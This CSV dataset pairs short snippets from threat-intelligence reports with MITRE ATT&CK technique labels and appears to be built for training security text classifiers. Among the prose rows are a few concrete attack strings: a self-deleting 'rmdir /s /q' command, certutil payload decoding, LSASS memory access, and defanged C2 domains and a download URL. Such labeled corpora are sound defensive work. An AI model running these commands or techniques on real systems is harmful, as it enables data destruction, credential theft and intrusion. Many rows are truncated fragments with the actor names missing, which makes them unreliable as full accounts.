text,label
can search for anti-virus products on the system.,T1518.001
has a command built in to use a raw TCP socket. ,T1095
UAC bypass implementation,T1548.002
leveraged Sysmon to understand the processes services in the organization.,T1057
has the ability to identify the user on a compromised host.,T1033
control flow obfuscation,T1027
can send collected data in JSON format to C2.,T1041
A  malware sample performs reflective DLL injection.(Citation: McAfee Lazarus Resurfaces Feb 2018),T1055
A Linux version of  checks if the victim user ID is anything other than zero (normally used for root) and the malware will not execute if it does not have root privileges.  also gathers the username of the victim.,T1033
can use Windows API's ConnectNamedPipe and WNetAddConnection2 to detect incoming connections and connect to remote shares.,T1106
has a command to delete its Registry key and scheduled task.,T1070.004
During  the threat actors downloaded additional droppers and backdoors onto a compromised system. ,T1105
includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus),T1027
Registry Editor,T1112
"The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime",T1140
has a module for performing remote desktop access.,T1021.001
performed process hollowing through the API calls CreateRemoteThread ResumeThread and Wow64SetThreadContext.,T1055
"pc.dll decrypts,",T1140
Creates registry key for persistence only,T1547.001
is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.(Citation: Fidelis Turbo),T1070.004
has deployed tools after moving laterally using administrative accounts.,T1570
has the ability to overwrite scripts and delete itself if a sandbox environment is detected.,T1070.004
"The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters.",T1027
has the ability to use the CreatePipe API to add a sub-process for execution via .,T1106
The application and the accompanying relevant and malicious DLL were both embedded in the loader’s resources.,T1027
These work in tandem to insert data into the Windows Registry,T1112
has the ability to execute command line arguments on a compromised host.,T1059.003
can enumerate running processes.,T1057
Malware used by  is capable of capturing keystrokes.,T1056.001
has relied on a user to execute a malicious attachment delivered via spearphishing.,T1204.002
can search files on a compromised host.,T1083
has supported use of a proxy server.,T1090
has used malicious files including VBS LNK and HTML for execution.,T1204.002
uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).,T1218.011
downloaded additional payloads after a target was infected with a first-stage downloader.,T1105
A flight of netlogon authentications were observed from the beachhead host to the domain controller as a possible attempt at exploiting the domain controller.,T1078
has disabled antivirus services on targeted systems in order to upload malicious payloads.,T1562.001
"When opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3)",T1105
has used malware that can capture screenshots of the victims machine.,T1113
"The data in the HTTP body is the same as the past variant,",T1071.001
searches for files that are 60mb and less and contain the following extensions: .doc .docx .xls .xlsx .ppt .pptx .exe .zip and .rar.  also runs the echo %APPDATA% command to list the contents of the directory.(Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)  can obtain the current execution path as well as perform drive enumeration.(Citation: Accenture SNAKEMACKEREL Nov 2018) ,T1083
finds a specified directory lists the files and metadata about those files.,T1083
has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.,T1070.004
"The malware checks if there are monitoring tools, specifically Process Monitor, running in the current machine with the following strings:
procmon
procmon64
procmon64a",T1518.001
 AmmyAdmin,T1219
establishes a backdoor over HTTP.,T1071.001
The user account was possibly compromised on the Linux server by using credential stuffing,T1110
Disabling PowerShell logging,T1562.001
can deobfuscate packed binaries in memory.,T1140
the HTTP C2 Communication section.,T1071.001
by passing the file path to be encrypted as an argument.,T1027
has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.,T1112
And that Run key references a different Registry key,T1547.001
Code responsible for downloading cron_script file,T1105
has deleted itself after creating a service as well as deleted a temporary file when the system reboots.,T1070.004
has named component DLLs RapportGP.dll to match those used by the security company Trusteer.,T1036.005
creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().,T1106
has the ability to write collected data to a file created in the ./LOGS directory.,T1074.001
One persistence mechanism used by  is to register itself as a scheduled task.,T1053.005
has used Google Chrome's decryption and extraction operations.,T1140
has been packed with multiple layers of encryption.,T1027
malware can decode contents from a payload that was Base64 encoded and write the contents to a file.,T1140
can read specific registry values.,T1012
has downloaded additional files and tools from its C2 server.,T1105
The current system username,T1033
can upload and download files to the victims machine.,T1105
modified the Registry to perform multiple techniques through the use of .,T1112
can obtain the name of the logged-in user on the victim.,T1033
has installed a Windows service to maintain persistence on victim machines.,T1543.003
can use a module to log keystrokes.,T1056.001
The  malware communicates to its command server using HTTP with an encrypted payload.,T1071.001
The  loader implements itself with the name Security Support Provider a legitimate Windows function. Various  .exe files mimic legitimate file names used by Microsoft Symantec Kaspersky Hewlett-Packard and VMWare.  also disguised malicious modules using similar filenames as custom network encryption software on victims.(Citation: Symantec Remsec IOCs),T1036.005
has sent spearphishing emails with malicious hta file attachments.,T1566.001
can delete itself following the successful execution of a follow-on payload.,T1070.004
can capture keystrokes on a compromised host.(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020),T1056.001
PowerShell de-obfuscation routine,T1140
capture screenshot,T1113
uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.,T1573.001
Domain fronting was mostly used by web services to bypass censorship in several countries that restricted traffic,T1090
has modified registry keys of ComSysApp Svchost and xmlProv on the machine to gain persistence.(Citation: Medium KONNI Jan 2020) ,T1112
obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.,T1027
"A new batch file, localdisk.bat, was also executed",T1059.003
"With the domain names decrypted, the DLL Loader decrypts 10 strings that should be URIs to be appended to the domains.",T1140
has called GetCurrentProcess.,T1057
has the ability to install itself as a service.,T1543.003
has decompressed data received from the C2 server.,T1140
can collect data from a compromised host.,T1005
has the ability to download VBS files to the target computer.,T1105
masks your traffic to a certain website by masquerading it as a different domain.,T1090
has used HTTP for C2 communications.,T1071.001
C:\Windows\System32\cmd.exe /c,T1059.003
a batch file,T1059.003
"Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup",T1547.001
has used RDP for lateral movement.,T1021.001
The batch file eyewear.bat then executed two commands,T1059.003
it locates a packed and compressed payload,T1027
The  command and control protocol's data stream can be encrypted with AES-CBC.,T1573.001
is encrypted using single-byte XOR.,T1027
source code used generic variable names and pre-obfuscated strings and was likely sanitized of developer comments before being added to . ,T1027
SetRegistryValue,T1112
systeminfo,T1082
has checked for the LogMein event log in an attempt to encrypt files in remote machines.,T1219
During  the threat actors used WMI to load  onto additional hosts within a compromised network.,T1570
can enumerate attached drives.,T1082
uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020),T1219
the threat actor primarily focuses on four different known remote code execution (RCE) vulnerabilities during their operations:•    CVE-2023-21839      Oracle WebLogic Server RCE [13]•    CVE-2021-3129      Laravel debug mode RCE [14]•    CVE-2020-2551      Oracle WebLogic RCE [15]•    CVE-2021-44228     Apache Log4j [16],T1190
exfiltrates collected information from its r1.log file to the external C2 server. ,T1041
can scan a directory to identify files for deletion.,T1083
using a variety of encryption schemes and symmetric keys.,T1573.001
communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks. ,T1573.001
can create a new service named msamger (Microsoft Security Accounts Manager).,T1543.003
encrypted gathered information with a combination of shifting and XOR using a static key.,T1027
has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.,T1090
can run cmd through an IRC channel.,T1059.003
enter this directly in the host OS command shell.,T1059.003
has used spearphishing emails to deliver  as a malicious attachment.,T1566.001
can use `rundll32` for execution of its components.,T1218.011
"SpyNote RAT captured the device’s screen activities along with audio using the  MediaProjectionCallback functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named ""video.mp4"" as shown in the following screenshot:          Figure 5 : Output File     SMS stealing  SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot below:          Figure 6: Reading SMS messages     Stealing contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the spyware",T1113
to download the second stage.,T1105
"The HTML attachments used HTML Smuggling to drop a password protected, zipped Windows Script File (WSF).",T1027
"Following the payload header, the malware expects blocks of
encrypted data with 8-byte headers.",T1027
a reverse proxy,T1090
has the ability to delete folders and files from a targeted system.,T1070.004
func_GetProcessor(),T1082
A scheduled task was then created using this same DLL.,T1053.005
uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.,T1140
can acquire network configuration information like DNS servers public IP and network proxies used by a host.(Citation: Github PowerShell Empire),T1016
has used scheduled tasks to establish persistence for various malware it uses including downloaders known as HARDTACK and SHIPBREAD and .,T1053.005
Disables Windows Defender Attack Surface Reduction (ASR) rules,T1562.001
can use a variant of the sysprep UAC bypass.,T1548.002
encrypts all strings using RC4 and bundles all functionality into a single function call. ,T1027
can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary. ,T1543.003
has searched local system resources to access sensitive documents.,T1005
has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.,T1027
has attempted to brute force credentials to gain access.,T1110
has a module to perform brute force attacks on a system. ,T1110
the threat actors checked running processes on the accessed hosts via taskmanager,T1057
can download files from C2.,T1105
During  the threat actors used `wmiexec.vbs` to run remote commands.,T1047
has infected victims via malicious attachments.,T1204.002
has the ability to identify any anti-virus installed on the infected system.,T1518.001
can store a file named `mpsvc.dll` which opens a malicious `mpsvc.mui` file in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.(Citation: Trend Micro DRBControl February 2020),T1574.002
has used  to register a scheduled task to execute malware during lateral movement.,T1053.005
can check for the presence of specific security products.,T1518.001
Downloads the miner and watcher.,T1105
The malware proceeds to decrypt and embedded configuration of 128 bytes using a simple XOR routine,T1140
"Retrieves  system default language, timezone and OS version",T1082
cmd.exe /c,T1059.003
proceeded to dump LSASS memory,T1003.001
"By running SSH on the server in a compromised network, attackers can come back to the network whenever they want",T1016
prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.(Citation: wardle evilquest partii),T1036.005
"the exfiltration of data on the system, such as OS, Processor (architecture),",T1082
Propagation through GPO,T1484.001
can execute getinfo to enumerate the computer name and OS version of a compromised system.,T1082
Many strings in  are obfuscated with a XOR algorithm.(Citation: F-Secure Sofacy 2015)(Citation: ESET Sednit Part 1),T1027
has used schtasks.exe for lateral movement in compromised networks.,T1053.005
has a module to create delete or modify Registry keys.,T1112
An  macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload.(Citation: Unit 42 Sofacy Feb 2018),T1140
used HTTP for C2 communications.  also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19),T1071.001
can use HTTP and HTTPS in C2 communications.(Citation: Talos Promethium June 2020),T1071.001
can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016),T1070.004
uses Windows API functions to execute files,T1106
Monitoring file system events to collect new and modified files.,T1005
is capable of writing a file to the compromised system from the C2 server.,T1105
has the ability to initiate keylogging.,T1056.001
"It calls OpenProcess on lsass.exe with access flag set to VM_READ, and looks for the modules wdigest.dll and lsasrv.dll loaded in the lsass.exe process.",T1003.001
has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017),T1071.001
can run shellcode it injects into a newly created process.,T1055
has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)(Citation: Cybereason Bumblebee August 2022),T1204.002
During  the threat actors used `ipconfig` `nbtstat` `tracert` `route print` and `cat /etc/hosts` commands.,T1016
can be executed using rundll32.exe.,T1218.011
download further malware payloads,T1105
"In one instance, APT29 created a Filter named BfeOnServiceStartTypeChange (Figure 1), which they configured to execute every Monday, Tuesday, Thursday, Friday, and Saturday at 11:33 am local time.     Figure 1: “BfeOnServiceStartTypeChange” WMI Query Language (WQL) filter condition The BfeOnServiceStartTypeChange Filter was bound to the CommandLineEventConsumer WindowsParentalControlsMigration",T1047
can be used to embed payload data within a new image file.,T1027
has been distributed via malicious Microsoft Office documents within spam emails.,T1566.001
a batch file,T1059.003
actors to execute directory traversal attacks,T1083
can capture keystrokes on a compromised host.,T1056.001
"using other known vulnerabilities for initial access, i.e. vulnerabilities in Citrix gateway devices",T1190
to persist in target environments and deploy additional tools.,T1105
decoding function,T1140
variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.,T1036.005
the payload decryption key,T1140
can gather the IP address from the victim's machine.,T1016
attackers also exploited vulnerabilities such as PrintNightmare to escalate privileges,T1068
[sic] section of a decoded FlowCloud config,T1140
queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation),T1012
antivirus check script,T1518.001
has used the Windows Command Shell and batch scripts for execution on compromised hosts.,T1059.003
"the threat actors first used a compromised, highly privileged account to access the device where the Azure Active Directory (Azure AD) Connect agent is installed.",T1078
has executed downloaded DLLs with rundll32.exe.,T1218.011
has dropped malicious files into the startup folder `%AppData%\Microsoft\Windows\Start Menu\Programs\Startup` on a compromised host in order to maintain persistence.,T1547.001
has collected the user name from a compromised host using `GetUserNameA`.,T1033
uses HTTP for C2 communications.,T1071.001
Decryption of the config buffer in the Forked Loader.,T1140
is a batch script,T1059.003
The output is then parsed to the targeted process ID with the help of tasklist filters.,T1057
During  the threat actors used HTTP GET requests for C2.,T1071.001
decrypts and executes in memory,T1140
uses encoded strings in its process kill list. ,T1027
After data is collected by  malware it is exfiltrated over the existing C2 channel.,T1041
"Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes",T1105
can gather information about the user on a compromised host.,T1033
can download and execute an arbitary executable.,T1105
has the ability to use TCP sockets to send data and ICMP to ping the C2 server.(Citation: BlackBerry CostaRicto November 2020),T1095
keylogging,T1056.001
has a command to gather the username from the system.,T1033
"Anyconnect[.]stream Bigip[.]stream Fortiweb[.]download Kaspersky[.]science microtik[.]stream owa365[.]bid symanteclive[.]download windowsdefender[.]win  The listed C2 servers all resolved to IPs belonging to a service provider in China at 1.2.9.0/24, which is the IP address used by the C2 server to send a cancel communications message to the end system",T1105
has the ability to deploy a reconnaissance module to retrieve a list of the active processes.,T1057
can use GetCurrentProcessId for process discovery.,T1057
encrypts C2 traffic using an XOR/ADD cipher.,T1573.001
During  the threat actors enabled HTTP and HTTPS listeners.,T1071.001
can use  for propagation on Windows hosts within intranets.,T1570
This file issued a GET request to download a malicious file from: hxxp://94.23.172.164/dupdatechecker.doc,T1105
performed password brute-force attacks on the local admin account.,T1110
can disable Security Center functions like anti-virus.(Citation: TrendMicro DarkComet Sept 2014),T1562.001
can execute commands via the command line utility.,T1059.003
has downloaded malware and tools--including Nishang and PowerCat--onto a compromised host. ,T1105
has the ability to execute commands through  on a compromised host.,T1059.003
has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017) ,T1204.002
"DLL sideloading,",T1574.002
has created LNK files in the Startup folder to establish persistence.,T1547.001
has the ability to decrypt an embedded .NET module.,T1140
can self-propagate in the network by using the legitimate PsExec utility,T1570
has used process hollowing in iexplore.exe to load the  implant.,T1055
malware has injected a Cobalt Strike beacon into Rundll32.exe.,T1055
"a remote service was created with random alphanumeric characters, service name and service file name",T1543.003
has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.,T1573.001
has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.,T1055
can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir /s /q`.,T1070.004
exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.(Citation: Cybereason Soft Cell June 2019),T1190
can query the Registry to determine if it has already been installed on the system.,T1012
using DeviceControl API methods,T1106
which is stored immediately before the encrypted config block.,T1027
has a XOR-encoded payload.,T1027
has used `cmd` for execution on an infected host.,T1059.003
has used an encrypted configuration file for its loader.,T1027
can send victim data to an actor-controlled C2 server.,T1041
has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.,T1573.001
has lured victims to execute malicious attachments included in crafted spearphishing emails related to current topics.,T1204.002
has used HTTP POST requests to communicate with its C2 server to receive commands. ,T1071.001
terminates anti-malware processes if theyre found running on the system.,T1562.001
starts using the Cobalt Strike beacon for remote access and command and control.,T1219
retrieves the same files from the C2,T1105
can collect the victim username.,T1033
has been XOR-encoded.,T1027
During  the threat actors obtained files and data from the compromised network.,T1005
can set a Registry key to determine how long it has been installed and possibly to indicate the version number.,T1112
has used a scheduled task for persistence.,T1053.005
During  threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.,T1106
has used tools to identify running processes on the victim's machine.,T1057
captures and DES-encrypts credentials before writing the username and password to a log file C:\log.txt.,T1056.001
has collected from a victim machine the system name processor information OS version and disk information including type and free space available.,T1082
"Get the total RAM size of compromised host by executing ""SELECT * FROM Win32_OperatingSystem"" and look for ""TotalVisibleMemorySize""",T1082
These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet.,T1090
has exploited the CVE-2016-0167 local vulnerability.(Citation: FireEye Fin8 May 2016),T1068
It uses a different custom packer,T1027
"Another component collects information about mapped volumes, including mount point, name, drive type, and disk usage data.",T1082
"When executed on a Windows Domain Controller (DC), the ransomware automatically creates a Group Policy, spreading itself to other machines within the domain.",T1484.001
distributing phishing emails containing malicious files,T1566.001
has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.,T1059.003
using a batch file named find.bat.,T1059.003
activity from a network proxy tool,T1090
brute forcing,T1110
Packed DLL analysis,T1027
has been known to establish persistence by adding programs to the Run Registry key.,T1547.001
has lured victims into executing malicious files.,T1204.002
has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable.,T1110
has the ability to steal documents from the local system including the print spooler queue.,T1005
may query the Registry by running reg query on a victim.,T1012
has the ability to launch files using ShellExecute.,T1106
can delete created files from a compromised system.,T1070.004
exploits CVE-2016-4117 to allow an executable to gain escalated privileges.,T1068
"Cadelspy initially arrives on the computer as a dropper, which downloads two installer components catering to whether the victim is running a 32-bit or 64-bit system",T1082
payloads are usually shellcode encrypted with a rolling XOR key.,T1027
"the sideloaded DLL),",T1574.002
ease of batch file execution.,T1059.003
cmd.exe /C whoami,T1033
has used process hollowing shellcode to target a predefined list of processes from %SYSTEM32%.,T1055
has used valid compromised credentials to gain access to victim environments.,T1078
During  threat actors disabled anti-virus and anti-spyware tools in some instances on the victims machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet.,T1562.001
"23 Take screenshot, temporarily store it as TPX499.dat, and upload it to the C2",T1113
has leveraged CreateProcessW() call to execute the debugger.,T1106
has exfiltrated stolen files to its C2 server.,T1041
uses the rem reg query command to obtain values from Registry keys.,T1012
can make modifications to Registry keys. ,T1112
The image and table below illustrate TClient’s encrypted configuration that we decrypted (via Python code):  Figure 10,T1140
